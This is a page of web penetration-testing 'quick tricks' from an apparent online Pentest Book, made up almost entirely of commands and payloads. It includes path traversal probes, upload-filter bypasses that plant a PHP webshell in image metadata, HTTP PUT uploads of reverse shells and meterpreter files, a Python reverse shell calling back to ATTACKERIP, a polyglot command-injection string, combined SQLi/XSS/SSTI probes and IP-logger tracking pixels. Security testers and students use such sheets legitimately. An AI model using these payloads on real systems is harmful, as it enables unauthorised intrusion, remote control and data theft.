Pentest Book
Search…
Quick tricks
1
# Web ports for nmap
2
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672
3
4
# Technology scanner
5
# https://github.com/urbanadventurer/WhatWeb
6
whatweb htttps://url.com
7
8
# Screenshot web
9
# https://github.com/maaaaz/webscreenshot
10
# https://github.com/sensepost/gowitness
11
# https://github.com/michenriksen/aquatone
12
13
# Get error with in input
14
%E2%A0%80%0A%E2%A0%80
15
16
# Retrieve additional info:
17
/favicon.ico/..%2f
18
/lol.png%23
19
/../../../
20
?debug=1
21
/server-status
22
/files/..%2f..%2f
23
24
# Change default header to accept */*
25
Accept: application/json, text/javascript, */*; q=0.01
26
27
# Sitemap to wordlist (httpie)
28
http https://target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt
29
30
# Bypass Rate Limits:
31
# Use different params:
32
sign-up, Sign-up, SignUp
33
# Null byte on params:
34
%00, %0d%0a, %09, %0C, %20, %0
35
36
# Bypass upload restrictions:
37
# Change extension: .pHp3 or pHp3.jpg
38
# Modify mimetype: Content-type: image/jpeg
39
# Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
40
# Add gif header: GIF89a;
41
# All at the same time.
42
43
# ImageTragic (memory leaks in gif preview)
44
# https://github.com/neex/gifoeb
45
./gifoeb gen 512x512 dump.gif
46
# Upload dump.gif multiple times, check if preview changes.
47
# Check docs for exploiting
48
49
# If upload from web is allowed or :
50
# https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888
51
# https://iplogger.org/invisible/
52
# https://iplogger.org/15bZ87
53
54
# Check HTTP options:
55
# Check if it is possible to upload
56
curl -v -k -X OPTIONS https://10.11.1.111/
57
# If put enabled, upload:
58
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
59
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
60
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
61
curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://VICTIMIP:8585/uploads/meterpreter.php
62
# If PUT is not allowed, try to override:
63
X-HTTP-Method-Override: PUT
64
X-Method-Override: PUT
65
66
# Retrieve endpoints
67
# LinkFinder
68
# https://github.com/GerbenJavado/LinkFinder
69
python linkfinder.py -i https://example.com -d
70
python linkfinder.py -i burpfile -b
71
72
# Retreive hidden parameters
73
# Tools
74
# https://github.com/s0md3v/Arjun
75
python3 arjun.py -u https://url.com --get
76
python3 arjun.py -u https://url.com --post
77
# https://github.com/maK-/parameth
78
python parameth.py -u https://example.com/test.php
79
# https://github.com/devanshbatham/ParamSpider
80
python3 paramspider.py --domain example.com
81
# https://github.com/s0md3v/Parth
82
python3 parth.py -t example.com
83
84
# .DS_Store files?
85
# https://github.com/gehaxelt/Python-dsstore
86
python main.py samples/.DS_Store.ctf
87
88
# Polyglot RCE payload
89
1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}
90
91
# Nmap web scan
92
nmap --script "http-*" example.com -p 443
93
94
# SQLi + XSS + SSTI
95
'"><svg/onload=prompt(5);>{{7*7}}
96
' ==> for Sql injection
97
"><svg/onload=prompt(5);> ==> for XSS
98
{{7*7}} ==> for SSTI/CSTI
99
100
# Try to connect with netcat to port 80
101
nc -v host 80
102
103
# Understand URL params with unfurl
104
https://dfir.blog/unfurl/
Copied!
Last modified 8mo ago
Export as PDF
Copy link